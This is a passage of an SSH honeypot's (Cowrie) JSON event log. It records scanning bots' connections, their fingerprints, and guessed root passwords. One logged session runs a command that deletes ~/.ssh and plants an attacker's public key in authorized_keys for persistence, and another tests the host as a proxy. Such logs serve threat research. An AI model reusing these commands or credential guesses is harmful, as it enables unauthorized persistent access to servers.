roup14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:08:25.193722Z","src_ip":"212.227.235.229","session":"84a8d4d3510a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:08:25.570135Z","src_ip":"212.227.235.229","session":"84a8d4d3510a"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:08:25.656091Z","src_ip":"212.227.235.229","session":"1539a4d2fe62"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:08:25.656906Z","src_ip":"212.227.235.229","session":"84a8d4d3510a"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61864,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a600928326f","protocol":"ssh","message":"New connection: 217.72.205.35:61864 (1.2.3.4:22) [session: 4a600928326f]","sensor":"my-vps","timestamp":"2025-09-09T08:08:34.480625Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:08:34.481703Z","src_ip":"217.72.205.35","session":"4a600928326f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51084,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc2f8b773974","protocol":"ssh","message":"New connection: 212.227.125.160:51084 (1.2.3.4:22) [session: fc2f8b773974]","sensor":"my-vps","timestamp":"2025-09-09T08:09:09.971931Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-09-09T08:09:10.176727Z","src_ip":"212.227.125.160","session":"fc2f8b773974"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-09-09T08:09:12.306705Z","src_ip":"212.227.125.160","session":"fc2f8b773974"}
{"eventid":"cowrie.login.failed","username":"sync","password":"click1","message":"login attempt [sync/click1] failed","sensor":"my-vps","timestamp":"2025-09-09T08:09:26.189677Z","src_ip":"212.227.125.160","session":"fc2f8b773974"}
{"eventid":"cowrie.session.closed","duration":"17.6","message":"Connection lost after 17.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:09:27.553438Z","src_ip":"212.227.125.160","session":"fc2f8b773974"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43280,"dst_ip":"1.2.3.4","dst_port":22,"session":"09ebc3001c42","protocol":"ssh","message":"New connection: 212.227.235.229:43280 (1.2.3.4:22) [session: 09ebc3001c42]","sensor":"my-vps","timestamp":"2025-09-09T08:09:33.989197Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:09:33.990106Z","src_ip":"212.227.235.229","session":"09ebc3001c42"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:09:34.083210Z","src_ip":"212.227.235.229","session":"09ebc3001c42"}
{"eventid":"cowrie.login.success","username":"root","password":"12qwas","message":"login attempt [root/12qwas] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:09:34.486643Z","src_ip":"212.227.235.229","session":"09ebc3001c42"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:09:34.675957Z","src_ip":"212.227.235.229","session":"09ebc3001c42"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:09:34.676881Z","src_ip":"212.227.235.229","session":"09ebc3001c42"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:09:34.678161Z","src_ip":"212.227.235.229","session":"09ebc3001c42"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:09:34.762079Z","src_ip":"212.227.235.229","session":"09ebc3001c42"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:09:35.031045Z","src_ip":"212.227.235.229","session":"09ebc3001c42"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T08:09:35.031727Z","src_ip":"212.227.235.229","session":"09ebc3001c42"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T08:09:35.116735Z","src_ip":"212.227.235.229","session":"09ebc3001c42"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:09:35.117755Z","src_ip":"212.227.235.229","session":"09ebc3001c42"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43282,"dst_ip":"1.2.3.4","dst_port":22,"session":"fbeec596dee4","protocol":"ssh","message":"New connection: 212.227.235.229:43282 (1.2.3.4:22) [session: fbeec596dee4]","sensor":"my-vps","timestamp":"2025-09-09T08:09:35.200223Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:09:35.200818Z","src_ip":"212.227.235.229","session":"fbeec596dee4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:09:35.284721Z","src_ip":"212.227.235.229","session":"fbeec596dee4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T08:09:35.668391Z","src_ip":"212.227.235.229","session":"fbeec596dee4"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:09:36.754996Z","src_ip":"212.227.235.229","session":"fbeec596dee4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43288,"dst_ip":"1.2.3.4","dst_port":22,"session":"5420a04d5127","protocol":"ssh","message":"New connection: 212.227.235.229:43288 (1.2.3.4:22) [session: 5420a04d5127]","sensor":"my-vps","timestamp":"2025-09-09T08:09:36.836944Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:09:36.837873Z","src_ip":"212.227.235.229","session":"5420a04d5127"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:09:36.921611Z","src_ip":"212.227.235.229","session":"5420a04d5127"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:09:37.297488Z","src_ip":"212.227.235.229","session":"5420a04d5127"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:09:37.383930Z","src_ip":"212.227.235.229","session":"09ebc3001c42"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:09:37.385339Z","src_ip":"212.227.235.229","session":"5420a04d5127"}
{"eventid":"cowrie.session.connect","src_ip":"185.246.128.133","src_port":32347,"dst_ip":"1.2.3.4","dst_port":22,"session":"177c58dab7d9","protocol":"ssh","message":"New connection: 185.246.128.133:32347 (1.2.3.4:22) [session: 177c58dab7d9]","sensor":"my-vps","timestamp":"2025-09-09T08:10:04.950913Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-PuTTY_Release_0.65","message":"Remote SSH version: SSH-2.0-PuTTY_Release_0.65","sensor":"my-vps","timestamp":"2025-09-09T08:10:04.952135Z","src_ip":"185.246.128.133","session":"177c58dab7d9"}
{"eventid":"cowrie.client.kex","hassh":"a7a87fbe86774c2e40cc4a7ea2ab1b3c","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a7a87fbe86774c2e40cc4a7ea2ab1b3c","sensor":"my-vps","timestamp":"2025-09-09T08:10:04.996119Z","src_ip":"185.246.128.133","session":"177c58dab7d9"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:10:05.855240Z","src_ip":"185.246.128.133","session":"177c58dab7d9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.74.78","dst_port":80,"src_ip":"185.246.128.133","src_port":6927,"message":"direct-tcp connection request to 142.250.74.78:80 from 127.0.0.1:6927","sensor":"my-vps","timestamp":"2025-09-09T08:10:05.901195Z","session":"177c58dab7d9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.74.78","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 142.250.74.78:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-09T08:10:05.946196Z","src_ip":"185.246.128.133","session":"177c58dab7d9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"src_ip":"185.246.128.133","src_port":10329,"message":"direct-tcp connection request to 2a00:1450:400f:802::200e:80 from 127.0.0.1:10329","sensor":"my-vps","timestamp":"2025-09-09T08:10:06.079173Z","session":"177c58dab7d9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2a00:1450:400f:802::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-09T08:10:06.124247Z","src_ip":"185.246.128.133","session":"177c58dab7d9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"185.246.128.133","src_port":5671,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:5671","sensor":"my-vps","timestamp":"2025-09-09T08:10:06.255293Z","session":"177c58dab7d9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-09T08:10:06.300198Z","src_ip":"185.246.128.133","session":"177c58dab7d9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"185.246.128.133","src_port":25767,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:25767","sensor":"my-vps","timestamp":"2025-09-09T08:10:06.431118Z","session":"177c58dab7d9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":3,"message":"discarded direct-tcp forward request 3 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-09T08:10:06.476095Z","src_ip":"185.246.128.133","session":"177c58dab7d9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"77.88.44.55","dst_port":80,"src_ip":"185.246.128.133","src_port":18986,"message":"direct-tcp connection request to 77.88.44.55:80 from 127.0.0.1:18986","sensor":"my-vps","timestamp":"2025-09-09T08:10:06.607206Z","session":"177c58dab7d9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"77.88.44.55","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":4,"message":"discarded direct-tcp forward request 4 to 77.88.44.55:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-09T08:10:06.652011Z","src_ip":"185.246.128.133","session":"177c58dab7d9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"185.246.128.133","src_port":10561,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:10561","sensor":"my-vps","timestamp":"2025-09-09T08:10:06.783232Z","session":"177c58dab7d9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":5,"message":"discarded direct-tcp forward request 5 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-09T08:10:06.827925Z","src_ip":"185.246.128.133","session":"177c58dab7d9"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:10:06.873521Z","src_ip":"185.246.128.133","session":"177c58dab7d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59306,"dst_ip":"1.2.3.4","dst_port":22,"session":"f26ec81a3815","protocol":"ssh","message":"New connection: 212.227.125.160:59306 (1.2.3.4:22) [session: f26ec81a3815]","sensor":"my-vps","timestamp":"2025-09-09T08:10:21.227353Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-09-09T08:10:21.285781Z","src_ip":"212.227.125.160","session":"f26ec81a3815"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@opens